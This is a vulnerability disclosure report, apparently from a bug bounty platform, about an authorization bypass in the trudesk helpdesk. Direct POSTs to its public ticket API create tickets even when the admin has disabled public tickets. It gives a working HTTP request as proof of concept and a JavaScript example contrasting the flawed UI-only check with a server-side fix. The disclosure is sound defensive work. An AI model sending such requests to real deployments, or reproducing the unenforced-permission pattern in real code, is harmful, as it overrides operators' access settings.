Improper Privilege Management in polonel/trudesk

Valid

Reported on

Jun 15th 2021


💥 BUG

External user can submit a ticket even when public ticket creation is disabled

💥 SUMMARY

External user can submit a ticket even when public ticket creation is disabled

💥 STEPS TO REPRODUCE

1. First, from the admin account go to Settings --> Tickets and disable "Allow public tickets".
External users then cannot create a ticket using the URL http://localhost:8118/newissue .

2. Now, as an external user, send the request below, which will still create a public ticket:

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0

{"user":{"fullname":"afaaaaterss","email":"vsssvvv@sssss.com"},"ticket":{"subject":"2222mmmm","issue":"afffteraaaaaaaa"},"captcha":"PVjf"}

So, despite public ticket creation being disabled, a user can still create a ticket. The setting is only enforced in the UI (the /newissue page), not in the /api/v1/public/tickets/create endpoint that the page submits to.
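To show the root cause from the defender's side, here is an added example (not trudesk's own code; the handler names, the in-memory stores and the allowPublicTickets setting name are assumptions): the flawed route pattern that relies on the UI to gate access, beside a handler that enforces the admin setting on the server for every request.

```javascript
// Added example, not trudesk's code. Constructed in-memory settings store
// standing in for the admin panel's "Allow public tickets" toggle (name assumed).
const settings = { allowPublicTickets: false };

// Constructed ticket store standing in for the database.
const tickets = [];

// Basic shape check on the JSON body shown in the report (user + ticket).
function isValidPayload(body) {
  return Boolean(body && body.user && body.user.email &&
                 body.ticket && body.ticket.subject && body.ticket.issue);
}

function storeTicket(body) {
  tickets.push({ subject: body.ticket.subject, issue: body.ticket.issue,
                 owner: body.user.email, source: 'public' });
}

// Flawed pattern: the /newissue page is hidden when the setting is off, but
// the API handler never consults the setting, so any client that posts the
// JSON directly still gets a ticket created.
function createPublicTicketVulnerable(req) {
  if (!isValidPayload(req.body)) return { status: 400, body: { success: false } };
  storeTicket(req.body);
  return { status: 200, body: { success: true } };
}

// Hardened pattern: the authorization decision is made server-side on every
// request, before validation and before any write, so it cannot be bypassed
// by skipping the front end. A captcha check is not a substitute for this.
function createPublicTicketFixed(req) {
  if (!settings.allowPublicTickets) {
    return { status: 403, body: { success: false, error: 'Public tickets are disabled' } };
  }
  if (!isValidPayload(req.body)) return { status: 400, body: { success: false } };
  storeTicket(req.body);
  return { status: 200, body: { success: true } };
}

function ticketCount() { return tickets.length; }

// Constructed request mirroring the report's body (values are placeholders).
const sampleReq = { body: { user: { fullname: 'example', email: 'user@example.invalid' },
                            ticket: { subject: 'subject', issue: 'issue' }, captcha: 'PVjf' } };
```

With the toggle off, the vulnerable handler returns 200 and stores the ticket, while the fixed handler returns 403 and stores nothing; flipping the toggle on lets the fixed handler accept the same request.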

Occurrences

Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame confirmed that a fix has been merged on 17c2eb a year ago
Chris Brame has been awarded the fix bounty